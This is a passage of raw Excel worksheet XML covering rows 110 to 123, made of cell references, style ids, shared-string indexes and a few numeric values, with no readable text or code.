      <c r="AF110" s="53" t="s">
        <v>960</v>
      </c>
      <c r="AG110" s="46" t="s">
        <v>961</v>
      </c>
      <c r="AH110" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI110" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ110" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK110" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL110" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="111" ht="153.75" customHeight="1">
      <c r="B111" s="44" t="s">
        <v>373</v>
      </c>
      <c r="C111" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D111" s="45" t="s">
        <v>950</v>
      </c>
      <c r="E111" s="45" t="s">
        <v>951</v>
      </c>
      <c r="F111" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G111" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H111" s="46" t="s">
        <v>952</v>
      </c>
      <c r="I111" s="46" t="s">
        <v>52</v>
      </c>
      <c r="J111" s="46" t="s">
        <v>962</v>
      </c>
      <c r="K111" s="47">
        <v>1.0</v>
      </c>
      <c r="L111" s="47">
        <v>0.0</v>
      </c>
      <c r="M111" s="48" t="s">
        <v>963</v>
      </c>
      <c r="N111" s="48">
        <v>9.0</v>
      </c>
      <c r="O111" s="48">
        <v>9.0</v>
      </c>
      <c r="P111" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q111" s="50" t="s">
        <v>964</v>
      </c>
      <c r="R111" s="50">
        <v>20.0</v>
      </c>
      <c r="S111" s="50">
        <v>26.0</v>
      </c>
      <c r="T111" s="49" t="s">
        <v>965</v>
      </c>
      <c r="U111" s="51" t="s">
        <v>966</v>
      </c>
      <c r="V111" s="51">
        <v>23.0</v>
      </c>
      <c r="W111" s="51">
        <v>44.0</v>
      </c>
      <c r="X111" s="49" t="s">
        <v>55</v>
      </c>
      <c r="Y111" s="52" t="s">
        <v>967</v>
      </c>
      <c r="Z111" s="52">
        <v>36.0</v>
      </c>
      <c r="AA111" s="52">
        <v>58.0</v>
      </c>
      <c r="AB111" s="49" t="s">
        <v>968</v>
      </c>
      <c r="AC111" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD111" s="65" t="s">
        <v>959</v>
      </c>
      <c r="AE111" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF111" s="53" t="s">
        <v>960</v>
      </c>
      <c r="AG111" s="46" t="s">
        <v>961</v>
      </c>
      <c r="AH111" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI111" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ111" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK111" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL111" s="66" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="112" ht="153.75" customHeight="1">
      <c r="B112" s="44" t="s">
        <v>373</v>
      </c>
      <c r="C112" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D112" s="45" t="s">
        <v>950</v>
      </c>
      <c r="E112" s="45" t="s">
        <v>951</v>
      </c>
      <c r="F112" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G112" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H112" s="46" t="s">
        <v>969</v>
      </c>
      <c r="I112" s="46" t="s">
        <v>609</v>
      </c>
      <c r="J112" s="46" t="s">
        <v>970</v>
      </c>
      <c r="K112" s="47">
        <v>1.0</v>
      </c>
      <c r="L112" s="47">
        <v>0.0</v>
      </c>
      <c r="M112" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N112" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O112" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P112" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q112" s="50" t="s">
        <v>971</v>
      </c>
      <c r="R112" s="50">
        <v>2.0</v>
      </c>
      <c r="S112" s="50">
        <v>2.0</v>
      </c>
      <c r="T112" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U112" s="51" t="s">
        <v>971</v>
      </c>
      <c r="V112" s="51">
        <v>2.0</v>
      </c>
      <c r="W112" s="51">
        <v>2.0</v>
      </c>
      <c r="X112" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y112" s="52" t="s">
        <v>972</v>
      </c>
      <c r="Z112" s="52">
        <v>5.0</v>
      </c>
      <c r="AA112" s="52">
        <v>43.0</v>
      </c>
      <c r="AB112" s="49" t="s">
        <v>342</v>
      </c>
      <c r="AC112" s="64" t="s">
        <v>212</v>
      </c>
      <c r="AD112" s="65" t="s">
        <v>973</v>
      </c>
      <c r="AE112" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF112" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG112" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH112" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI112" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ112" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK112" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL112" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="113" ht="153.75" customHeight="1">
      <c r="B113" s="44" t="s">
        <v>373</v>
      </c>
      <c r="C113" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D113" s="45" t="s">
        <v>974</v>
      </c>
      <c r="E113" s="45" t="s">
        <v>975</v>
      </c>
      <c r="F113" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G113" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H113" s="46" t="s">
        <v>976</v>
      </c>
      <c r="I113" s="46" t="s">
        <v>52</v>
      </c>
      <c r="J113" s="46" t="s">
        <v>977</v>
      </c>
      <c r="K113" s="47">
        <v>1.0</v>
      </c>
      <c r="L113" s="47">
        <v>0.0</v>
      </c>
      <c r="M113" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N113" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O113" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P113" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q113" s="50" t="s">
        <v>978</v>
      </c>
      <c r="R113" s="50">
        <v>6.0</v>
      </c>
      <c r="S113" s="50">
        <v>6.0</v>
      </c>
      <c r="T113" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U113" s="51" t="s">
        <v>978</v>
      </c>
      <c r="V113" s="51">
        <v>6.0</v>
      </c>
      <c r="W113" s="51">
        <v>6.0</v>
      </c>
      <c r="X113" s="49" t="s">
        <v>965</v>
      </c>
      <c r="Y113" s="52" t="s">
        <v>979</v>
      </c>
      <c r="Z113" s="52">
        <v>10.0</v>
      </c>
      <c r="AA113" s="52">
        <v>12.0</v>
      </c>
      <c r="AB113" s="49" t="s">
        <v>980</v>
      </c>
      <c r="AC113" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD113" s="65" t="s">
        <v>981</v>
      </c>
      <c r="AE113" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF113" s="53" t="s">
        <v>982</v>
      </c>
      <c r="AG113" s="46" t="s">
        <v>983</v>
      </c>
      <c r="AH113" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI113" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ113" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK113" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL113" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="114" ht="153.75" customHeight="1">
      <c r="B114" s="44" t="s">
        <v>373</v>
      </c>
      <c r="C114" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D114" s="45" t="s">
        <v>984</v>
      </c>
      <c r="E114" s="45" t="s">
        <v>985</v>
      </c>
      <c r="F114" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G114" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H114" s="46" t="s">
        <v>986</v>
      </c>
      <c r="I114" s="46" t="s">
        <v>503</v>
      </c>
      <c r="J114" s="46" t="s">
        <v>987</v>
      </c>
      <c r="K114" s="47">
        <v>1.0</v>
      </c>
      <c r="L114" s="47">
        <v>0.0</v>
      </c>
      <c r="M114" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N114" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O114" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P114" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q114" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R114" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S114" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T114" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U114" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V114" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W114" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X114" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y114" s="52">
        <v>2002749.2002752</v>
      </c>
      <c r="Z114" s="52">
        <v>2.0</v>
      </c>
      <c r="AA114" s="52">
        <v>6.0</v>
      </c>
      <c r="AB114" s="49">
        <v>2002749.2002752</v>
      </c>
      <c r="AC114" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD114" s="65" t="s">
        <v>988</v>
      </c>
      <c r="AE114" s="65" t="s">
        <v>989</v>
      </c>
      <c r="AF114" s="53" t="s">
        <v>990</v>
      </c>
      <c r="AG114" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH114" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI114" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ114" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK114" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL114" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="115" ht="153.75" customHeight="1">
      <c r="B115" s="44" t="s">
        <v>373</v>
      </c>
      <c r="C115" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D115" s="45" t="s">
        <v>991</v>
      </c>
      <c r="E115" s="45" t="s">
        <v>992</v>
      </c>
      <c r="F115" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G115" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H115" s="46" t="s">
        <v>993</v>
      </c>
      <c r="I115" s="46" t="s">
        <v>994</v>
      </c>
      <c r="J115" s="46" t="s">
        <v>995</v>
      </c>
      <c r="K115" s="47">
        <v>1.0</v>
      </c>
      <c r="L115" s="47">
        <v>0.0</v>
      </c>
      <c r="M115" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N115" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O115" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P115" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q115" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R115" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S115" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T115" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U115" s="51">
        <v>44489.0</v>
      </c>
      <c r="V115" s="51">
        <v>1.0</v>
      </c>
      <c r="W115" s="51">
        <v>1.0</v>
      </c>
      <c r="X115" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y115" s="52" t="s">
        <v>996</v>
      </c>
      <c r="Z115" s="52">
        <v>5.0</v>
      </c>
      <c r="AA115" s="52">
        <v>9.0</v>
      </c>
      <c r="AB115" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC115" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD115" s="65" t="s">
        <v>997</v>
      </c>
      <c r="AE115" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF115" s="53" t="s">
        <v>998</v>
      </c>
      <c r="AG115" s="65" t="s">
        <v>999</v>
      </c>
      <c r="AH115" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI115" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ115" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK115" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL115" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="116" ht="153.75" customHeight="1">
      <c r="B116" s="44" t="s">
        <v>373</v>
      </c>
      <c r="C116" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D116" s="45" t="s">
        <v>1000</v>
      </c>
      <c r="E116" s="45" t="s">
        <v>1001</v>
      </c>
      <c r="F116" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G116" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H116" s="46" t="s">
        <v>1002</v>
      </c>
      <c r="I116" s="46" t="s">
        <v>1003</v>
      </c>
      <c r="J116" s="46" t="s">
        <v>1004</v>
      </c>
      <c r="K116" s="47">
        <v>1.0</v>
      </c>
      <c r="L116" s="47">
        <v>0.0</v>
      </c>
      <c r="M116" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N116" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O116" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P116" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q116" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R116" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S116" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T116" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U116" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V116" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W116" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X116" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y116" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z116" s="52">
        <v>2.0</v>
      </c>
      <c r="AA116" s="52">
        <v>2.0</v>
      </c>
      <c r="AB116" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC116" s="64" t="s">
        <v>205</v>
      </c>
      <c r="AD116" s="65" t="s">
        <v>1005</v>
      </c>
      <c r="AE116" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF116" s="53" t="s">
        <v>1006</v>
      </c>
      <c r="AG116" s="65" t="s">
        <v>1007</v>
      </c>
      <c r="AH116" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI116" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ116" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK116" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL116" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="117" ht="153.75" customHeight="1">
      <c r="B117" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C117" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D117" s="45" t="s">
        <v>1009</v>
      </c>
      <c r="E117" s="45" t="s">
        <v>1010</v>
      </c>
      <c r="F117" s="55" t="s">
        <v>1011</v>
      </c>
      <c r="G117" s="45" t="s">
        <v>1012</v>
      </c>
      <c r="H117" s="46" t="s">
        <v>1013</v>
      </c>
      <c r="I117" s="46" t="s">
        <v>550</v>
      </c>
      <c r="J117" s="46" t="s">
        <v>1014</v>
      </c>
      <c r="K117" s="47">
        <v>1.0</v>
      </c>
      <c r="L117" s="47">
        <v>0.0</v>
      </c>
      <c r="M117" s="48" t="s">
        <v>1015</v>
      </c>
      <c r="N117" s="48">
        <v>3.0</v>
      </c>
      <c r="O117" s="48">
        <v>48.0</v>
      </c>
      <c r="P117" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q117" s="50" t="s">
        <v>1016</v>
      </c>
      <c r="R117" s="50">
        <v>3.0</v>
      </c>
      <c r="S117" s="50">
        <v>48.0</v>
      </c>
      <c r="T117" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U117" s="51" t="s">
        <v>1017</v>
      </c>
      <c r="V117" s="51">
        <v>4.0</v>
      </c>
      <c r="W117" s="51">
        <v>112.0</v>
      </c>
      <c r="X117" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y117" s="52" t="s">
        <v>1018</v>
      </c>
      <c r="Z117" s="52">
        <v>8.0</v>
      </c>
      <c r="AA117" s="52">
        <v>148.0</v>
      </c>
      <c r="AB117" s="49" t="s">
        <v>1019</v>
      </c>
      <c r="AC117" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD117" s="65" t="s">
        <v>1020</v>
      </c>
      <c r="AE117" s="65" t="s">
        <v>1021</v>
      </c>
      <c r="AF117" s="53" t="s">
        <v>1022</v>
      </c>
      <c r="AG117" s="46" t="s">
        <v>1023</v>
      </c>
      <c r="AH117" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI117" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ117" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK117" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL117" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="118" ht="153.75" customHeight="1">
      <c r="B118" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C118" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D118" s="45" t="s">
        <v>1009</v>
      </c>
      <c r="E118" s="45" t="s">
        <v>1010</v>
      </c>
      <c r="F118" s="55" t="s">
        <v>1011</v>
      </c>
      <c r="G118" s="45" t="s">
        <v>1012</v>
      </c>
      <c r="H118" s="46" t="s">
        <v>1024</v>
      </c>
      <c r="I118" s="46" t="s">
        <v>1025</v>
      </c>
      <c r="J118" s="46" t="s">
        <v>1026</v>
      </c>
      <c r="K118" s="47">
        <v>1.0</v>
      </c>
      <c r="L118" s="47">
        <v>0.0</v>
      </c>
      <c r="M118" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N118" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O118" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P118" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q118" s="50">
        <v>2043217.0</v>
      </c>
      <c r="R118" s="50">
        <v>1.0</v>
      </c>
      <c r="S118" s="50">
        <v>5.0</v>
      </c>
      <c r="T118" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U118" s="51">
        <v>2043217.504</v>
      </c>
      <c r="V118" s="51">
        <v>2.0</v>
      </c>
      <c r="W118" s="51">
        <v>8.0</v>
      </c>
      <c r="X118" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y118" s="52" t="s">
        <v>1027</v>
      </c>
      <c r="Z118" s="52">
        <v>9.0</v>
      </c>
      <c r="AA118" s="52">
        <v>28.0</v>
      </c>
      <c r="AB118" s="49" t="s">
        <v>406</v>
      </c>
      <c r="AC118" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD118" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE118" s="65" t="s">
        <v>1028</v>
      </c>
      <c r="AF118" s="53" t="s">
        <v>1029</v>
      </c>
      <c r="AG118" s="46" t="s">
        <v>1030</v>
      </c>
      <c r="AH118" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI118" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ118" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK118" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL118" s="66" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="119" ht="153.75" customHeight="1">
      <c r="B119" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C119" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D119" s="45" t="s">
        <v>1031</v>
      </c>
      <c r="E119" s="45" t="s">
        <v>1032</v>
      </c>
      <c r="F119" s="55" t="s">
        <v>1033</v>
      </c>
      <c r="G119" s="45" t="s">
        <v>1034</v>
      </c>
      <c r="H119" s="46" t="s">
        <v>1035</v>
      </c>
      <c r="I119" s="46" t="s">
        <v>1036</v>
      </c>
      <c r="J119" s="46" t="s">
        <v>1037</v>
      </c>
      <c r="K119" s="47">
        <v>1.0</v>
      </c>
      <c r="L119" s="47">
        <v>0.0</v>
      </c>
      <c r="M119" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N119" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O119" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P119" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q119" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R119" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S119" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T119" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U119" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V119" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W119" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X119" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y119" s="52" t="s">
        <v>10</v>
      </c>
      <c r="Z119" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AA119" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB119" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC119" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD119" s="65" t="s">
        <v>1038</v>
      </c>
      <c r="AE119" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF119" s="53" t="s">
        <v>1039</v>
      </c>
      <c r="AG119" s="65" t="s">
        <v>1040</v>
      </c>
      <c r="AH119" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI119" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ119" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK119" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL119" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="120" ht="153.75" customHeight="1">
      <c r="B120" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C120" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D120" s="45" t="s">
        <v>1041</v>
      </c>
      <c r="E120" s="45" t="s">
        <v>1042</v>
      </c>
      <c r="F120" s="55" t="s">
        <v>1043</v>
      </c>
      <c r="G120" s="45" t="s">
        <v>1044</v>
      </c>
      <c r="H120" s="46" t="s">
        <v>1045</v>
      </c>
      <c r="I120" s="46" t="s">
        <v>1046</v>
      </c>
      <c r="J120" s="46" t="s">
        <v>1047</v>
      </c>
      <c r="K120" s="47">
        <v>1.0</v>
      </c>
      <c r="L120" s="47">
        <v>0.0</v>
      </c>
      <c r="M120" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N120" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O120" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P120" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q120" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R120" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S120" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T120" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U120" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V120" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W120" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X120" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y120" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z120" s="52">
        <v>2.0</v>
      </c>
      <c r="AA120" s="52">
        <v>8.0</v>
      </c>
      <c r="AB120" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC120" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD120" s="65" t="s">
        <v>1048</v>
      </c>
      <c r="AE120" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF120" s="53" t="s">
        <v>1049</v>
      </c>
      <c r="AG120" s="65" t="s">
        <v>1050</v>
      </c>
      <c r="AH120" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI120" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ120" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK120" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL120" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="121" ht="153.75" customHeight="1">
      <c r="B121" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C121" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D121" s="45" t="s">
        <v>1051</v>
      </c>
      <c r="E121" s="45" t="s">
        <v>1052</v>
      </c>
      <c r="F121" s="55" t="s">
        <v>10</v>
      </c>
      <c r="G121" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H121" s="46" t="s">
        <v>1053</v>
      </c>
      <c r="I121" s="46" t="s">
        <v>1054</v>
      </c>
      <c r="J121" s="46" t="s">
        <v>1055</v>
      </c>
      <c r="K121" s="47">
        <v>1.0</v>
      </c>
      <c r="L121" s="47">
        <v>1.0</v>
      </c>
      <c r="M121" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N121" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O121" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P121" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q121" s="103" t="s">
        <v>687</v>
      </c>
      <c r="R121" s="50">
        <v>2.0</v>
      </c>
      <c r="S121" s="50">
        <v>2.0</v>
      </c>
      <c r="T121" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U121" s="104" t="s">
        <v>687</v>
      </c>
      <c r="V121" s="51">
        <v>2.0</v>
      </c>
      <c r="W121" s="51">
        <v>2.0</v>
      </c>
      <c r="X121" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y121" s="52" t="s">
        <v>1056</v>
      </c>
      <c r="Z121" s="52">
        <v>5.0</v>
      </c>
      <c r="AA121" s="52">
        <v>20.0</v>
      </c>
      <c r="AB121" s="49" t="s">
        <v>604</v>
      </c>
      <c r="AC121" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD121" s="65" t="s">
        <v>1057</v>
      </c>
      <c r="AE121" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF121" s="53" t="s">
        <v>1058</v>
      </c>
      <c r="AG121" s="65" t="s">
        <v>1059</v>
      </c>
      <c r="AH121" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI121" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ121" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK121" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL121" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="122" ht="153.75" customHeight="1">
      <c r="B122" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C122" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D122" s="45" t="s">
        <v>1060</v>
      </c>
      <c r="E122" s="45" t="s">
        <v>1061</v>
      </c>
      <c r="F122" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G122" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H122" s="46" t="s">
        <v>1062</v>
      </c>
      <c r="I122" s="46" t="s">
        <v>1063</v>
      </c>
      <c r="J122" s="46" t="s">
        <v>1064</v>
      </c>
      <c r="K122" s="47">
        <v>1.0</v>
      </c>
      <c r="L122" s="47">
        <v>0.0</v>
      </c>
      <c r="M122" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N122" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O122" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P122" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q122" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R122" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S122" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T122" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U122" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V122" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W122" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X122" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y122" s="52">
        <v>2002752.2002749</v>
      </c>
      <c r="Z122" s="52">
        <v>2.0</v>
      </c>
      <c r="AA122" s="52">
        <v>2.0</v>
      </c>
      <c r="AB122" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC122" s="105" t="s">
        <v>212</v>
      </c>
      <c r="AD122" s="101" t="s">
        <v>1065</v>
      </c>
      <c r="AE122" s="65" t="s">
        <v>1066</v>
      </c>
      <c r="AF122" s="53" t="s">
        <v>1067</v>
      </c>
      <c r="AG122" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH122" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI122" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ122" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK122" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL122" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="123" ht="153.75" customHeight="1">
      <c r="B123" s="44" t="s">
        <v>1008</v>
      </c>
      <c r="C123" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D123" s="45" t="s">
        <v>1068</v>
      </c>
      <c r="E123" s="45" t="s">
        <v>1069</v>
      </c>
      <c r="F123" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G123" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H123" s="46" t="s">
        <v>1070</v>
      </c>
      <c r="I123" s="46" t="s">
        <v>1071</v>
      </c>
      <c r="J123" s="46" t="s">
        <v>1072</v>
      </c>
      <c r="K123" s="47">
        <v>1.0</v>
      </c>
      <c r="L123" s="47">
        <v>0.0</v>
      </c>
      <c r="M123" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N123" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O123" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P123" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q123" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R123" s="50" t="s">
        <v>10</v>
      </c>
